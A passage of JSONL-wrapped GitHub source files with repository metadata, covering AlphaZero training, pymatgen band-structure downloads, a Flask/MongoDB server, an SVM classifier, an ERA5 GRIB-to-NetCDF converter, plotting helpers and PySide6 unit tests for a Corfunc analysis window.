> self.kl_targ * 4:\n break\n\n if kl > self.kl_targ * 2 and self.lr_multiplier > 0.1:\n self.lr_multiplier /= 1.5\n elif kl < self.kl_targ / 2 and self.lr_multiplier < 10:\n self.lr_multiplier *= 1.5\n\n self.optim.update_learning_rate(self.lr_multiplier)\n\n print(\n f\"kl - {kl} | lr_multiplier - {self.lr_multiplier} | loss - {loss}\")\n print(\"-\" * 100 + \"\\r\\n\")\n\n if step % CHECKOUT == 0:\n result = [0, 0, 0] # draw win loss\n for _ in range(EVALNUMS):\n game.reset()\n game.evaluate(result)\n\n if result[1] + result[2] == 0:\n rate = 0\n else:\n rate = result[1] / (result[1] + result[2])\n\n print(f\"step - {step} evaluation\")\n print(\n f\"win - {result[1]} | loss - {result[2]} | draw - {result[0]}\")\n\n # save or reload model\n if rate >= WINRATE:\n print(f\"new best model. rate - {rate}\")\n self.net.save_model(path=model_path)\n self.eval_net.load_model(\n path=model_path, cuda=self.use_cuda)\n else:\n print(f\"load last model. rate - {rate}\")\n self.net.load_model(path=model_path, cuda=self.use_cuda)\n\n print(\"-\" * 100 + \"\\r\\n\")\n\n\nif __name__ == \"__main__\":\n t = Train()\n t.run()\n", "repo_name": "ne7ermore/torch-light", "sub_path": "alpha-zero/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 4085, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 526, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.cuda.manual_seed", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 19, "usage_type": "call"}, {"api_name": "data_loader.DataLoader", "line_number": 31, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 52, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 56, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 56, "usage_type": "call"}, {"api_name": "game.Game", "line_number": 61, "usage_type": "call"}, {"api_name": "game.play", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 80, "usage_type": "call"}, {"api_name": "game.reset", "line_number": 98, "usage_type": "call"}, {"api_name": "game.evaluate", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "28209633258", "text": "from pymatgen.ext.matproj import MPRester\nfrom pymatgen.electronic_structure.bandstructure import BandStructureSymmLine\n\nimport json as json\n\ndef save_structure(bs, filename):\n\t\"\"\"\n\tTakes pymatgen BandStructure/BandStructureSymmLine object and save to json\n\t\"\"\"\n\tif not filename.endswith(\".json\"):\n\t\tprint(\"File must be saved in json format\")\n\n\twith open(filename, \"w+\") as f:\n\t\tjson.dump(bs.as_dict(), f)\n\ndef load_structure(filename):\n\t\"\"\"\n\tLoad bandstructure from json and return either BandSructure or BandStructureSymmLine \n\t\"\"\"\n\tif not filename.endswith(\".json\"):\n\t\tprint(\"File must be saved in json format\")\n\n\twith open(filename, \"r\") as f:\n\t\td = json.load(f)\n\n\t\tbs = BandStructureSymmLine.from_dict(d)\n\t\t\n\treturn bs\n\n\nif __name__ == \"__main__\":\n\twith open(\"api_key.txt\") as f: API_KEY = f.readline()\n\n\tmpr = MPRester(API_KEY)\n\t\n\tbs_ZnO = mpr.get_bandstructure_by_material_id(\"mp-2133\")\n\tbs_SnO2 = mpr.get_bandstructure_by_material_id(\"mp-856\")\n\tbs_SiC = mpr.get_bandstructure_by_material_id(\"mp-11714\")\n\n\tsave_structure(bs_ZnO, \"data/ZnO.json\")\n\tsave_structure(bs_SnO2, \"data/SnO2.json\")\n\tsave_structure(bs_SiC, \"data/SiC.json\")\n\t\n\n\n\n\n", "repo_name": "hkve/SMN-summer-job", "sub_path": "MP/get_structure.py", "file_name": "get_structure.py", "file_ext": "py", "file_size_in_byte": 1144, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.dump", "line_number": 14, "usage_type": "call"}, {"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pymatgen.electronic_structure.bandstructure.BandStructureSymmLine.from_dict", "line_number": 26, "usage_type": "call"}, {"api_name": "pymatgen.electronic_structure.bandstructure.BandStructureSymmLine", "line_number": 26, "usage_type": "name"}, {"api_name": "pymatgen.ext.matproj.MPRester", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "70404981925", "text": "from werkzeug.exceptions import HTTPException\nfrom flask_pymongo import PyMongo\nfrom flask import Flask, jsonify, request\n\nfrom game import api, jwt #, admin\n\n# ----- App init -----\napp = Flask(__name__)\njwt.keypair = jwt.set_keypair(jwt.read_keyfiles())\n\napp.config['MONGO_DBNAME'] = 'savo'\napp.config['MONGO_URI'] = 'mongodb://mongodb:27017/savo'\nmongo = PyMongo(app)\ndb = mongo.db\n\n# ----- Routes -----\napp.add_url_rule('/', 'index', api.index, methods=['GET', 'BREW'])\napp.add_url_rule('/user', 'user', api.user, defaults={ 'db': db, 'token': jwt.get() }, methods=['GET'])\napp.add_url_rule('/register', 'register', api.register, defaults={ 'db': db }, methods=['POST'])\napp.add_url_rule('/login', 'login', jwt.login, defaults={ 'db': db }, methods=['POST'])\napp.add_url_rule('/logout', 'logout', jwt.logout, methods=['GET', 'POST'])\n\n@app.errorhandler(Exception)\ndef handleError(err): # game/__init__.py do some funky lol in production?\n if isinstance(err, HTTPException):\n return err\n return 'Internal Server Error', 500\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8060)\n\n", "repo_name": "Ghost-Zephyr/savo", "sub_path": "server/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 1107, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "game.jwt.keypair", "line_number": 9, "usage_type": "attribute"}, {"api_name": "game.jwt", "line_number": 9, "usage_type": "name"}, {"api_name": "game.jwt.set_keypair", "line_number": 9, "usage_type": "call"}, {"api_name": "game.jwt.read_keyfiles", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_pymongo.PyMongo", "line_number": 13, "usage_type": "call"}, {"api_name": "game.api.index", "line_number": 17, "usage_type": "attribute"}, {"api_name": "game.api", "line_number": 17, "usage_type": "name"}, {"api_name": "game.api.user", "line_number": 18, "usage_type": "attribute"}, {"api_name": "game.api", "line_number": 18, "usage_type": "name"}, {"api_name": "game.jwt.get", "line_number": 18, "usage_type": "call"}, {"api_name": "game.jwt", "line_number": 18, "usage_type": "name"}, {"api_name": "game.api.register", "line_number": 19, "usage_type": "attribute"}, {"api_name": "game.api", "line_number": 19, "usage_type": "name"}, {"api_name": "game.jwt.login", "line_number": 20, "usage_type": "attribute"}, {"api_name": "game.jwt", "line_number": 20, "usage_type": "name"}, {"api_name": "game.jwt.logout", "line_number": 21, "usage_type": "attribute"}, {"api_name": "game.jwt", "line_number": 21, "usage_type": "name"}, {"api_name": "werkzeug.exceptions.HTTPException", "line_number": 25, "usage_type": "argument"}]} +{"seq_id": "73521105124", "text": "# coding=utf-8\n\nfrom __future__ import print_function\n\nimport time\nimport logging\nimport apyllo\n\n\ndef main():\n apyllo.set_logger(\n 'apyllo',\n logging.DEBUG,\n rotate_file_path='/tmp/apyllo.log',\n )\n client = apyllo.client(\n config_server_host=\"your-apollo-meta-service.com\",\n fallback_to_local=False,\n app_id=\"apyllo-demo\",\n namespaces=[\"application\", \"demo.yml\"],\n )\n\n # will blocking for seconds while do first-time polling.\n client.start()\n\n # do your work.\n # e.g. user could manually download ns config.\n # client.download(\"demo.yml\")\n\n print(\n \"got application key `demo` value: {}\".format(\n client.get_value(\"demo\", \"application\", \"NONE\")\n )\n )\n\n print(\n \"got demo.yml content: \\r\\n{}\".format(\n client.get_content(\"demo.yml\")\n )\n )\n\n client.stop()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "Colstuwjx/apyllo", "sub_path": "examples/client_call.py", "file_name": "client_call.py", "file_ext": "py", "file_size_in_byte": 935, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "apyllo.set_logger", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 13, "usage_type": "attribute"}, {"api_name": "apyllo.client", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "20632072550", "text": "\n# Importing packages\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import GridSearchCV\n\nbank_marketing_cleaned = pd.read_csv('/Users/sathu/Desktop/bank_marketing/data_clean/bank_marketing_data_cleaned.csv', index_col=None) # replace the path\n\n# dynamically identifying the independent features\nx_var = list(bank_marketing_cleaned.columns)\nx_var.remove(\"subscribed\")\n\n# Splitting the dataset into test and train sets 80:20 respectively\nX_train, X_test, y_train, y_test = train_test_split(bank_marketing_cleaned[x_var], bank_marketing_cleaned[\"subscribed\"] ,test_size = 0.2, random_state = 100)\n\nprint(\"Data has been split into train and test sets\")\n\n# Training the model on train set\nmodel = SVC()\nmodel.fit(X_train, y_train)\n\nprint(\"Model trained! Results below : \\n\\n\")\n \n# Printing prediction results\npredictions = model.predict(X_test)\nprint(classification_report(y_test, predictions))\nprint(\"\\n\\n\")\nprint(\"Performing a Grid search to identify best set of parameters\")\n\n# defining parameter range for GridSearch\nparam_grid = {'C': [0.1, 1, 10, 100, 1000], \n 'gamma': [1, 0.1, 0.01, 0.001, 0.0001],\n 'kernel': ['poly','rbf']} \n \ngrid = GridSearchCV(SVC(), param_grid, refit = True, verbose = 3)\n \n# Fitting the model for grid search\ngrid.fit(X_train, y_train)", "repo_name": "sathu95/bank_marketing_term_deposit_prediction", "sub_path": "bank_marketing/src/3_data_modeling.py", "file_name": "3_data_modeling.py", "file_ext": "py", "file_size_in_byte": 1445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 16, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "12507748085", "text": "\"\"\"Cmorizer\n\nERA5 cmorizer is mostly based on the official ECMWF documentation of converting GRIB to NetCDF:\n\nhttps://confluence.ecmwf.int/display/OIFS/How+to+convert+GRIB+to+netCDF\n\n\"\"\"\n\nimport os\nimport subprocess\nfrom os import path as op\nfrom pprint import pprint\nfrom warnings import warn\n\nimport pandas as pd\nimport xarray as xr\nfrom cdo import Cdo\n\n# path and file templates at DKRZ\n# see https://docs.dkrz.de/doc/dataservices/finding_and_accessing_data/era_data/#file-and-directory-names\npath_template = (\n \"/pool/data/ERA5/{era_id}/{level_type}/{dataType}/{frequency}/{code:03d}\"\n)\nfile_template = \"{era_id}{level_type}{typeid}_{frequency}_{date}_{code:03d}.grb\"\n\n\ndef get_output_filename(date, expid, path=None):\n if path is None:\n path = \"./\"\n date = pd.to_datetime(date).strftime(\"%Y%m%d%H\")\n return op.join(path, f\"g{expid}a{date}.nc\")\n\n\ndef params_by_code(params, code):\n for k, v in params.items():\n c = v.get(\"code\", -999)\n if code == c:\n return v | {\"rename\": k}\n return None\n\n\ndef renames_by_code(ds, params):\n renames = {}\n for var in ds.data_vars:\n code = ds[var].attrs.get(\"code\", -999)\n param = params_by_code(params, code)\n if param:\n renames[var] = param[\"rename\"]\n return renames\n\n\ndef get_params(config):\n defaults = config.get(\"defaults\", {})\n return {k: defaults | v for k, v in config[\"parameters\"].items()}\n\n\ndef check_search(result):\n if len(result) == 0:\n warn(f\"nothing found: {len(result)}\")\n return None\n if len(result) > 1:\n pass\n # warn(f\"result not unique: {len(result)}, {result}\")\n return result.iloc[0].path\n\n\ndef get_file_from_intake(cat, params, date=None):\n \"\"\"get filename entry from intake catalog\"\"\"\n if date is not None:\n date = pd.to_datetime(date).strftime(\"%Y-%m-%d\")\n freq = params.get(\"frequency\", None)\n if freq is None or freq == \"invariant\":\n date = \"INVARIANT\"\n return cat.search(**params, validation_date=date)\n\n\ndef get_files_from_intake(cat, params, date=None):\n files = {}\n for k, v in params.items():\n f = check_search(get_file_from_intake(cat, params=v, date=date).df)\n if not f:\n warn(f\"no result for {k} --> params: {v}\")\n files[k] = f\n return files\n\n\ndef get_file_from_template(date, era_id, frequency, dataType, code, level_type):\n \"\"\"Derive filename from filename template\n\n Derives filename according to https://docs.dkrz.de/doc/dataservices/finding_and_accessing_data/era_data/#file-and-directory-names\n\n \"\"\"\n lt = {\n \"model_level\": \"ml\",\n \"surface\": \"sf\",\n }\n freqs = {\n \"hourly\": \"1H\",\n \"daily\": \"1D\",\n \"monthly\": \"1M\",\n \"invariant\": \"IV\",\n }\n typeids = {\n \"an\": \"00\",\n \"fc\": \"12\",\n }\n\n level_type = lt.get(level_type, level_type)\n frequency = freqs.get(frequency, frequency)\n typeid = typeids.get(dataType, dataType)\n if frequency == \"IV\":\n date = \"INVARIANT\"\n else:\n date = pd.to_datetime(date).strftime(\"%Y-%m-%d\")\n return op.join(path_template, file_template).format(\n date=date,\n era_id=era_id,\n frequency=frequency,\n dataType=dataType,\n code=code,\n level_type=level_type,\n typeid=typeid,\n )\n\n\ndef get_files_from_template(params, date):\n files = {}\n for k, v in params.items():\n f = get_file_from_template(date=date, **v)\n if not f:\n warn(f\"no result for {k} --> params: {v}\")\n files[k] = f\n return files\n\n\nclass ERA5:\n \"\"\"\n Class for cmorizing original ERA5 GRIB data.\n\n Notes\n -----\n The cmorizer class mostly works with the intake catalog provided by DKRZ.\n\n References\n ----------\n Please refer to the DKRZ data pool documentation: https://docs.dkrz.de/doc/dataservices/finding_and_accessing_data/era_data\n\n \"\"\"\n\n dynamic = [\"ta\", \"hus\", \"ps\", \"tos\", \"sic\", \"clw\", \"snd\"]\n wind = [\"svo\", \"sd\"]\n fx = [\"orog\", \"sftlf\"]\n chunks = {}\n options = \"-f nc4\"\n\n def __init__(self, params, cat=None, gridfile=None, scratch=None):\n if isinstance(cat, str):\n import intake\n\n self.cat = intake.open_esm_datastore(cat)\n else:\n self.cat = cat\n if scratch is None:\n scratch = os.environ.get(\"SCRATCH\", \"./\")\n self.scratch = scratch\n self.params = params\n self.gridfile = gridfile\n self.cdo = Cdo(tempdir=scratch)\n\n def _get_files(self, date):\n if self.cat:\n return get_files_from_intake(\n self.cat,\n {\n k: v\n for k, v in self.params.items()\n if k in self.dynamic + self.fx + self.wind\n },\n date,\n )\n else:\n return get_files_from_template(\n date=date,\n params={\n k: v\n for k, v in self.params.items()\n if k in self.dynamic + self.fx + self.wind\n },\n )\n\n def _seldate(self, filename, date):\n return f\"--seldate,{date} {filename}\"\n # return self.cdo.seldate(date, input=filename)\n\n def _seldates(self, filenames, date):\n return {\n v: (\n self._seldate(f, date)\n if self.params[v].get(\"frequency\") != \"invariant\"\n else f\n )\n for v, f in filenames.items()\n }\n\n def _to_regulars(self, filenames, gridtypes):\n return {\n v: self._to_regular(f, gridtype=gridtypes[v], setname=v)\n for v, f in filenames.items()\n if v in self.dynamic + self.fx\n }\n\n def _get_gridtypes(self, filenames):\n return {v: self._gridtype(f) for v, f in filenames.items()}\n\n def _to_netcdf(self, filenames):\n pass\n\n def _open_dsets(self, filenames):\n dsets = {}\n for v, f in filenames.items():\n ds = xr.open_dataset(f, chunks=self.chunks)\n if v in self.fx:\n # squeeze out time\n ds = ds.squeeze(drop=True)\n dsets[v] = ds\n return dsets\n\n def _griddes(self, filename):\n griddes = self.cdo.griddes(input=filename)\n return {\n entry.split(\"=\")[0].strip(): entry.split(\"=\")[1].strip()\n for entry in griddes\n if \"=\" in entry\n }\n\n def _gridtype(self, filename):\n return self._griddes(filename)[\"gridtype\"]\n\n def _to_regular(self, filename, gridtype=None, setname=\"\", table=\"ecmwf\"):\n \"\"\"converts ecmwf spectral grib data to regular gaussian netcdf.\n\n cdo is used to convert ecmwf grid data to netcdf depending on the gridtype:\n For 'gaussian_reduced': cdo setgridtype,regular\n 'spectral' : cdo sp2gpl\n\n This follows the recommendation from the ECMWF Era5 Documentation.\n We also invert the latitudes to stick with cmor standard.\n\n \"\"\"\n if table is None:\n table = \"\"\n # from cdo import Cdo\n # cdo = Cdo(tempdir=scratch)\n if gridtype is None:\n gridtype = self._gridtype(filename)\n # options = f\"-f nc4 -t {table}\"\n if setname:\n setname = f\"--setname,{setname}\" # {filename}\"\n if gridtype == \"gaussian_reduced\":\n gaussian = \"--setgridtype,regular\"\n elif gridtype == \"spectral\":\n gaussian = \"--sp2gpl\"\n elif gridtype == \"gaussian\":\n gaussian = \"\"\n else:\n raise Exception(\n \"unknown grid type for conversion to regular grid: {}\".format(gridtype)\n )\n command = f\"{setname} {gaussian} {filename}\"\n return command\n\n def _compute_wind(self, vort, div):\n \"\"\"compute wind from vorticity and divergence\"\"\"\n return f\"--chname,u,ua,v,va --dv2uvl --merge {vort} {div}\"\n\n def gfile(self, date, path=None, expid=None, filename=None):\n \"\"\"Create an ERA5 gfile dataset.\n\n Main function to convert ERA5 grib data to a regular gaussian Dataset\n containing all variables required for REMO preprocessing.\n\n Parameters\n ----------\n date : date in ISO 8601 format.\n Date for which the variables should be converted.\n output: str\n Name of output file.\n path: str\n Output path for the gfile.\n expid: str\n Experiment id for the filenaming template.\n filename: str\n Filename including path for the output filename. If not provided,\n the filename will be created automatically from path and expid.\n\n Returns\n -------\n Output filename.\n\n \"\"\"\n if expid is None:\n expid = \"000000\"\n if filename is None:\n filename = get_output_filename(date, expid, path)\n print(f\"output filename: {filename}\")\n # gridfile = \"/work/ch0636/g300046/remo/era5-cmor/notebooks/grid.txt\"\n\n print(\"getting files...\")\n files = self._get_files(date)\n pprint(f\"using files: \\n{files}\")\n print(\"getting gridtypes...\")\n gridtypes = self._get_gridtypes(files)\n print(\"selecting dates...\")\n seldates = self._seldates(files, date)\n print(\"convert to regular grid...\")\n regulars = self._to_regulars(seldates, gridtypes)\n print(\"computing wind...\")\n wind = self._compute_wind(seldates[\"svo\"], seldates[\"sd\"])\n\n merge = f\"--setgrid,{self.gridfile} --merge \" + \" \".join(\n list(regulars.values()) + [wind]\n )\n call = f\"cdo {self.options} invertlat {merge} {filename}\"\n print(f\"execute: {call}\")\n\n subprocess.run(\n call.split(),\n check=True,\n shell=False,\n )\n # stdout, stderr = process.communicate()\n\n return filename\n # return self.cdo.invertlat(options=self.options, input=merge, output=filename)\n", "repo_name": "remo-rcm/pyremo", "sub_path": "pyremo/preproc/era5.py", "file_name": "era5.py", "file_ext": "py", "file_size_in_byte": 10081, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.to_datetime", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 70, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 82, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 131, "usage_type": "call"}, {"api_name": "intake.open_esm_datastore", "line_number": 160, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 164, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 164, "usage_type": "attribute"}, {"api_name": "cdo.Cdo", "line_number": 168, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 221, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 310, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 326, "usage_type": "call"}]} +{"seq_id": "37312593253", "text": "import matplotlib.pyplot as plt\n\n\ndef plot_simulation(time_ms, vm, n, m, h, inj_array, save_to=None, title=''):\n figure = plt.figure(figsize=(15, 10))\n ax1 = plt.subplot(511)\n ax1.set_title(title, fontSize=20)\n ax1.plot(time_ms, vm)\n ax1.set_ylabel(\"V (mV)\")\n ax1.set_xlabel(\"time (ms)\")\n\n ax2 = plt.subplot(512)\n ax2.plot(time_ms, n, color='red')\n ax2.set_ylabel(\"n\")\n ax2.set_xlabel(\"time (ms)\")\n\n ax3 = plt.subplot(513)\n ax3.plot(time_ms, m, color='green')\n ax3.set_ylabel(\"m\")\n ax3.set_xlabel(\"time (ms)\")\n\n ax4 = plt.subplot(514)\n ax4.plot(time_ms, h, color='black')\n ax4.set_ylabel(\"h\")\n ax4.set_xlabel(\"time (ms)\")\n\n ax5 = plt.subplot(515)\n ax5.plot(time_ms, inj_array)\n ax5.set_ylabel(\"inj current (µA/mm²)\")\n ax5.set_xlabel(\"time (ms)\")\n\n if save_to is not None:\n plt.savefig(save_to)\n\n return figure\n", "repo_name": "V3RGANz/cncourse2020", "sub_path": "assignment1/visualization.py", "file_name": "visualization.py", "file_ext": "py", "file_size_in_byte": 891, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 6, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "41467451408", "text": "import os\nimport sys\n\nimport pytest\n\nfrom PySide6 import QtGui, QtWidgets\nfrom PySide6 import QtCore\nfrom PySide6.QtTest import QTest\n\nfrom sas.qtgui.Perspectives.Corfunc.CorfuncPerspective import CorfuncWindow\nfrom sas.qtgui.Plotting.PlotterData import Data1D\nfrom sasdata.dataloader.loader import Loader\nfrom sas.qtgui.MainWindow.DataManager import DataManager\nimport sas.qtgui.Utilities.GuiUtils as GuiUtils\n\n\nclass CorfuncTest:\n '''Test the Corfunc Interface'''\n\n @pytest.fixture(autouse=True)\n def widget(self, qapp, mocker):\n '''Create/Destroy the CorfuncWindow'''\n class MainWindow(object):\n def __init__(self, widget):\n self.model = QtGui.QStandardItemModel()\n\n class dummy_manager(object):\n def __init__(self, widget):\n self.filesWidget = MainWindow()\n\n def communicator(self, widget):\n return GuiUtils.Communicate()\n\n def communicate(self, widget):\n return GuiUtils.Communicate()\n\n w = CorfuncWindow(dummy_manager())\n reference_data1 = Data1D(x=[0.1, 0.2, 0.3, 0.4, 0.5], y=[1000, 1000, 100, 10, 1], dy=[0.0, 0.0, 0.0, 0.0, 0.0])\n reference_data1.filename = \"Test A\"\n mocker.patch.object(GuiUtils, 'dataFromItem', return_value=reference_data1)\n self.fakeData = QtGui.QStandardItem(\"test\")\n\n yield w\n\n w.close()\n\n @pytest.mark.xfail(reason=\"2022-09 already broken\")\n def testDefaults(self, widget):\n '''Test the GUI in its default state'''\n assert isinstance(widget, QtWidgets.QWidget)\n assert widget.windowTitle() == \"Corfunc Perspective\"\n assert widget.model.columnCount() == 1\n assert widget.model.rowCount() == 16\n assert widget.txtLowerQMin.text() == '0.0'\n assert not widget.txtLowerQMin.isEnabled()\n assert widget.txtFilename.text() == ''\n assert widget.txtLowerQMax.text() == '0.01'\n assert widget.txtUpperQMin.text() == '0.20'\n assert widget.txtUpperQMax.text() == '0.22'\n assert widget.txtBackground.text() == '0'\n assert widget.txtGuinierA.text() == '0.0'\n assert widget.txtGuinierB.text() == '0.0'\n assert widget.txtPorodK.text() == '0.0'\n assert widget.txtPorodSigma.text() == '0.0'\n assert widget.txtAvgCoreThick.text() == '0'\n assert widget.txtAvgIntThick.text() == '0'\n assert widget.txtAvgHardBlock.text() == '0'\n assert widget.txtPolydisp.text() == '0'\n assert widget.txtLongPeriod.text() == '0'\n assert widget.txtLocalCrystal.text() == '0'\n\n @pytest.mark.xfail(reason=\"2022-09 already broken\")\n def testOnCalculate(self, widget, mocker):\n \"\"\" Test onCompute function \"\"\"\n mocker.patch.object(widget, 'calculate_background')\n widget.cmdCalculateBg.setEnabled(True)\n QTest.mouseClick(widget.cmdCalculateBg, QtCore.Qt.LeftButton)\n assert widget.calculate_background.called_once()\n\n @pytest.mark.xfail(reason=\"2022-09 already broken - input file issue\")\n def testProcess(self, widget):\n \"\"\"Test the full analysis path\"\"\"\n\n filename = os.path.join(\"UnitTesting\", \"ISIS_98929.txt\")\n try:\n os.stat(filename)\n except OSError:\n assert False, \"ISIS_98929.txt does not exist\"\n f = Loader().load(filename)\n mocker.patch.object(QtWidgets.QFileDialog, 'getOpenFileName', return_value=(filename, ''))\n\n #assert widget.txtFilename.text() == filename\n\n assert float(widget.txtBackground.text()) == 0.0\n\n widget.txtLowerQMin.setText(\"0.01\")\n widget.txtLowerQMax.setText(\"0.20\")\n widget.txtUpperQMax.setText(\"0.22\")\n\n QTest.mouseClick(widget.cmdCalculateBg, QtCore.Qt.LeftButton)\n\n\n #TODO: All the asserts when Calculate is clicked and file properly loaded\n #assert float(widget.txtBackground.text()) > 0.2\n\n #widget.extrapolateBtn.click()\n #assert float(widget.txtGuinierA.text()) > 1\n #assert float(widget.txtGuinierB.text()) < -10000\n #assert float(widget.txtPorodK.text()) > 10\n #assert float(widget.txtPorodSigma.text()) > 10\n\n #################################################\n # The testing framework does not seem to handle\n # multi-threaded Qt. Signals emitted from threads\n # are not detected when run in the unittest, even\n # though they ARE handled in the actual application.\n #################################################\n # sleep(1)\n # widget.transformBtn.click()\n # while float(widget.longPeriod.text()) == 0.0:\n # print(\"Waiting\")\n # sleep(1)\n # assert float(widget.longPeriod.text()) > 10\n # assert float(widget.polydisp.text()) > 0\n # assert float(widget.localCrystal.text()) > 0\n # assert float(widget.longPeriod.text()) > float(widget.avgHardBlock.text()) > 0\n # assert float(widget.longPeriod.text()) > float(widget.avgIntThick.text()) > 0\n # assert float(widget.longPeriod.text()) > float(widget.avgCoreThick.text()) > 0\n\n @pytest.mark.xfail(reason=\"2022-09 already broken\")\n def testSerialization(self, widget):\n \"\"\" Serialization routines \"\"\"\n widget.setData([self.fakeData])\n assert hasattr(widget, 'isSerializable')\n assert widget.isSerializable()\n self.checkFakeDataState(widget)\n data = GuiUtils.dataFromItem(widget._model_item)\n data_id = str(data.id)\n # Test three separate serialization routines\n state_all = widget.serializeAll()\n state_one = widget.serializeCurrentPage()\n page = widget.getPage()\n # Pull out params from state\n params_dict = state_all.get(data_id)\n params = params_dict.get('corfunc_params')\n # Tests\n assert len(state_all) == len(state_one)\n assert len(state_all) == 1\n # getPage should include an extra param 'data_id' removed by serialize\n assert len(params) != len(page)\n assert len(params) == 15\n assert len(page) == 16\n\n @pytest.mark.xfail(reason=\"2022-09 already broken\")\n def testRemoveData(self, widget):\n widget.setData([self.fakeData])\n self.checkFakeDataState(widget)\n # Removing something not already in the perspective should do nothing\n widget.removeData([])\n self.checkFakeDataState(widget)\n # Removing the data from the perspective should set it to base state\n widget.removeData([self.fakeData])\n # Be sure the defaults hold true after data removal\n self.testDefaults()\n\n @pytest.mark.xfail(reason=\"2022-09 already broken\")\n def testLoadParams(self, widget):\n widget.setData([self.fakeData])\n self.checkFakeDataState(widget)\n pageState = widget.getPage()\n widget.updateFromParameters(pageState)\n self.checkFakeDataState(widget)\n widget.removeData([self.fakeData])\n self.testDefaults()\n\n def checkFakeDataState(self, widget):\n assert widget.txtFilename.text() == 'data'\n assert widget.txtLowerQMin.text() == '0.0'\n assert not widget.txtLowerQMin.isEnabled()\n assert widget.txtLowerQMax.text() == '0.01'\n assert widget.txtUpperQMin.text() == '0.20'\n assert widget.txtUpperQMax.text() == '0.22'\n assert widget.txtBackground.text() == '0'\n assert widget.txtGuinierA.text() == ''\n assert widget.txtGuinierB.text() == ''\n assert widget.txtPorodK.text() == ''\n assert widget.txtPorodSigma.text() == ''\n assert widget.txtAvgCoreThick.text() == ''\n assert widget.txtAvgIntThick.text() == ''\n assert 